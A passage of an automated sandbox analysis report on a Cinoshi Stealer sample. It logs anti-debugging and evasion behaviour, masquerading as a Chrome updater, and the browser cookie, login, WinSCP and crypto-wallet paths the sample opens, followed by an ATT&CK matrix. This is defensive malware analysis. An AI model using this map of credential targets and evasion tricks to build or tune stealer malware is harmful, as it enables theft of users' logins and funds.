        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeThread delayed: delay time: 596875Jump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeThread delayed: delay time: 596766Jump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeThread delayed: delay time: 596644Jump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeThread delayed: delay time: 596516Jump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeThread delayed: delay time: 596406Jump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeThread delayed: delay time: 596297Jump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeThread delayed: delay time: 596188Jump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeThread delayed: delay time: 596078Jump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeThread delayed: delay time: 595969Jump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeThread delayed: delay time: 595859Jump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeThread delayed: delay time: 595750Jump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeThread delayed: delay time: 595640Jump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeThread delayed: delay time: 595531Jump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeThread delayed: delay time: 595422Jump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeThread delayed: delay time: 595312Jump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeThread delayed: delay time: 595203Jump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeThread delayed: delay time: 595092Jump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeThread delayed: delay time: 594984Jump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeThread delayed: delay time: 594875Jump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeThread delayed: delay time: 594766Jump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeThread delayed: delay time: 594656Jump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeThread delayed: delay time: 594547Jump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeThread delayed: delay time: 594438Jump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeThread delayed: delay time: 594328Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeThread delayed: delay time: 600000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeThread delayed: delay time: 599875Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeThread delayed: delay time: 599766Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeThread delayed: delay time: 599656Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeThread delayed: delay time: 599546Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeThread delayed: delay time: 599437Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeThread delayed: delay time: 599328Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeThread delayed: delay time: 599217Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeThread delayed: delay time: 599109Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeThread delayed: delay time: 599000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeThread delayed: delay time: 598891Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeThread delayed: delay time: 598766Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeThread delayed: delay time: 598641Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeThread delayed: delay time: 598530Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeThread delayed: delay time: 598394Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeThread delayed: delay time: 598266Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeThread delayed: delay time: 598153Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeThread delayed: delay time: 597876Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeThread delayed: delay time: 597734Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeThread delayed: delay time: 597613Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeThread delayed: delay time: 595750Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeThread delayed: delay time: 595625Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeThread delayed: delay time: 595516Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeThread delayed: delay time: 595405Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeThread delayed: delay time: 595297Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeThread delayed: delay time: 595186Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeThread delayed: delay time: 595076Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeThread delayed: delay time: 594964Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeThread delayed: delay time: 594859Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeThread delayed: delay time: 300000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeThread delayed: delay time: 594750Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeThread delayed: delay time: 594639Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeThread delayed: delay time: 594531Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeThread delayed: delay time: 594421Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeThread delayed: delay time: 594309Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeThread delayed: delay time: 594201Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeThread delayed: delay time: 594094Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeThread delayed: delay time: 593984Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeThread delayed: delay time: 593873Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeThread delayed: delay time: 593719Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeThread delayed: delay time: 593590Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeThread delayed: delay time: 593483Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeThread delayed: delay time: 593375Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeThread delayed: delay time: 593265Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeThread delayed: delay time: 593156Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeThread delayed: delay time: 593047Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeThread delayed: delay time: 592937Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeThread delayed: delay time: 592828Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeThread delayed: delay time: 592718Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeThread delayed: delay time: 592609Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeThread delayed: delay time: 592500Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeThread delayed: delay time: 592390Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeThread delayed: delay time: 592281Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeThread delayed: delay time: 592170Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeThread delayed: delay time: 592061Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeThread delayed: delay time: 591953Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeThread delayed: delay time: 591844Jump to behavior
        Source: LnSNtO8JIa.exe, 00000000.00000002.3357143512.0000000000CA1000.00000004.00000020.00020000.00000000.sdmp, Chrome.exe, 00000005.00000002.3360224564.0000000000F53000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeProcess information queried: ProcessInformationJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeCode function: 0_2_01085D94 LdrInitializeThunk,0_2_01085D94
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeCode function: 0_2_6C3D86FD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6C3D86FD
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeCode function: 0_2_6C3D8CA8 OutputDebugStringA,GetLastError,_free,_free,SetLastError,SetLastError,_abort,0_2_6C3D8CA8
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeCode function: 0_2_6C3D6E94 mov eax, dword ptr fs:[00000030h]0_2_6C3D6E94
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeCode function: 0_2_6C415E10 OutputDebugStringA,OutputDebugStringA,GetProcessHeap,OutputDebugStringA,OutputDebugStringA,GetLastError,lstrlenW,HeapAlloc,OutputDebugStringA,OutputDebugStringA,GetEnvironmentVariableW,OutputDebugStringA,OutputDebugStringA,GetLastError,OutputDebugStringA,OutputDebugStringA,GetModuleFileNameW,OutputDebugStringA,GetLastError,OutputDebugStringA,lstrcatW,lstrcatW,lstrcatW,lstrcatW,GetFileAttributesW,OutputDebugStringA,OutputDebugStringA,WinVerifyTrust,OutputDebugStringA,OutputDebugStringA,GetModuleHandleW,GetModuleHandleW,GetModuleHandleW,OutputDebugStringA,GetLastError,GetProcAddress,OutputDebugStringA,OutputDebugStringA,StrongNameSignatureVerificationEx,OutputDebugStringA,OutputDebugStringA,StrongNameTokenFromAssembly,OutputDebugStringA,StrongNameErrorInfo,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,GetEnvironmentVariableW,OutputDebugStringA,GetCurrentThreadId,GetCurrentProcessId,wsprintfW,GetEnvironmentVariableW,OutputDebugStringA,GetLastError,SetEnvironmentVariableW,OutputDebugStringA,GetLastError,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,StrongNameFreeBuffer,HeapFree,OutputDebugStringA,0_2_6C415E10
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeCode function: 0_2_6C3D86FD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6C3D86FD
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeCode function: 0_2_6C3D1B0A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6C3D1B0A
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeCode function: 0_2_6C3D11CD SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_6C3D11CD
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeMemory allocated: page read and write | page guardJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeCode function: 0_2_6C3D1CEB cpuid 0_2_6C3D1CEB
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeQueries volume information: C:\Users\user\Desktop\LnSNtO8JIa.exe VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\netstandard\v4.0_2.0.0.0__cc7b13ffcd2ddd51\netstandard.dll VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeQueries volume information: C:\Users\user\Desktop\System.Data.SQLite.dll VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeQueries volume information: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\netstandard\v4.0_2.0.0.0__cc7b13ffcd2ddd51\netstandard.dll VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeCode function: 0_2_6C3D1A27 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_6C3D1A27
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeCode function: 0_2_6C3DA081 _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,0_2_6C3DA081
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

        Stealing of Sensitive Information

        barindex
        Yara detected Cinoshi Stealer
        Source: Yara matchFile source: Process Memory Space: LnSNtO8JIa.exe PID: 3172, type: MEMORYSTR
        Found many strings related to Crypto-Wallets (likely being stolen)
        Source: LnSNtO8JIa.exe, 00000000.00000002.3365215653.0000000002B27000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Electrum
        Source: LnSNtO8JIa.exe, 00000000.00000002.3365215653.0000000002B27000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: q5\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb
        Source: LnSNtO8JIa.exe, 00000000.00000002.3365215653.0000000002B27000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: \Exodus\exodus.wallet
        Source: LnSNtO8JIa.exe, 00000000.00000002.3365215653.0000000002B27000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: \Ethereum\keystore
        Source: LnSNtO8JIa.exe, 00000000.00000002.3365215653.0000000002B27000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Exodus
        Source: LnSNtO8JIa.exe, 00000000.00000002.3365215653.0000000002B27000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Ethereum
        Source: LnSNtO8JIa.exe, 00000000.00000002.3365215653.0000000002B27000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: 37504C8ot find a part of the path 'C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets'.veldb'.e__0.indexeddb.leveldb'.\amkmjjmmflddogmhpjloimipbofnfjih'.
        Source: LnSNtO8JIa.exe, 00000000.00000002.3365215653.0000000002B27000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: \Ethereum\keystore
        Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\SessionsJump to behavior
        Tries to harvest and steal browser information (history, passwords, etc)
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqliteJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
        Tries to steal Crypto Currency Wallets
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\Jump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
        Source: Yara matchFile source: 00000000.00000002.3365215653.0000000002B27000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: LnSNtO8JIa.exe PID: 3172, type: MEMORYSTR

        Remote Access Functionality

        barindex
        Yara detected Cinoshi Stealer
        Source: Yara matchFile source: Process Memory Space: LnSNtO8JIa.exe PID: 3172, type: MEMORYSTR
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeCode function: 0_2_6C416640 GetModuleHandleW,GetModuleHandleW,OutputDebugStringA,OutputDebugStringA,GetModuleHandleW,OutputDebugStringA,OutputDebugStringA,GetLastError,GetProcAddress,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,CorBindToRuntimeEx,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,0_2_6C416640

        Mitre Att&ck Matrix

        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpactResource DevelopmentReconnaissance
        Valid Accounts131
        Windows Management Instrumentation        		2
        Registry Run Keys / Startup Folder        		1
        Process Injection        		1
        Disable or Modify Tools        		1
        OS Credential Dumping        		2
        System Time Discovery        		Remote Services1
        Archive Collected Data        		Exfiltration Over Other Network Medium3
        Ingress Tool Transfer        		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationAbuse Accessibility FeaturesAcquire InfrastructureGather Victim Identity Information
        Default Accounts2
        Command and Scripting Interpreter        		Boot or Logon Initialization Scripts2
        Registry Run Keys / Startup Folder        		1
        Deobfuscate/Decode Files or Information        		1
        Credentials in Registry        		2
        File and Directory Discovery        		Remote Desktop Protocol3
        Data from Local System        		Exfiltration Over Bluetooth21
        Encrypted Channel        		SIM Card SwapObtain Device Cloud BackupsNetwork Denial of ServiceDomainsCredentials
        Domain AccountsAtLogon Script (Windows)Logon Script (Windows)2
        Obfuscated Files or Information        		Security Account Manager45
        System Information Discovery        		SMB/Windows Admin Shares1
        Screen Capture        		Automated Exfiltration4
        Non-Application Layer Protocol        		Data Encrypted for ImpactDNS ServerEmail Addresses
        Local AccountsCronLogin HookLogin Hook1
        Timestomp        		NTDS1
        Query Registry        		Distributed Component Object Model1
        Clipboard Data        		Traffic Duplication5
        Application Layer Protocol        		Data DestructionVirtual Private ServerEmployee Names
        Cloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
        Masquerading        		LSA Secrets261
        Security Software Discovery        		SSHKeyloggingScheduled TransferFallback ChannelsData Encrypted for ImpactServerGather Victim Network Information
        Replication Through Removable MediaScheduled TaskRC ScriptsRC Scripts141
        Virtualization/Sandbox Evasion        		Cached Domain Credentials1
        Process Discovery        		VNCGUI Input CaptureData Transfer Size LimitsMultiband CommunicationService StopBotnetDomain Properties
        External Remote ServicesSystemd TimersStartup ItemsStartup Items1
        Process Injection        		DCSync141
        Virtualization/Sandbox Evasion        		Windows Remote ManagementWeb Portal CaptureExfiltration Over C2 ChannelCommonly Used PortInhibit System RecoveryWeb ServicesDNS
        Drive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
        Application Window Discovery        		Cloud ServicesCredential API HookingExfiltration Over Alternative ProtocolApplication Layer ProtocolDefacementServerlessNetwork Trust Dependencies

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.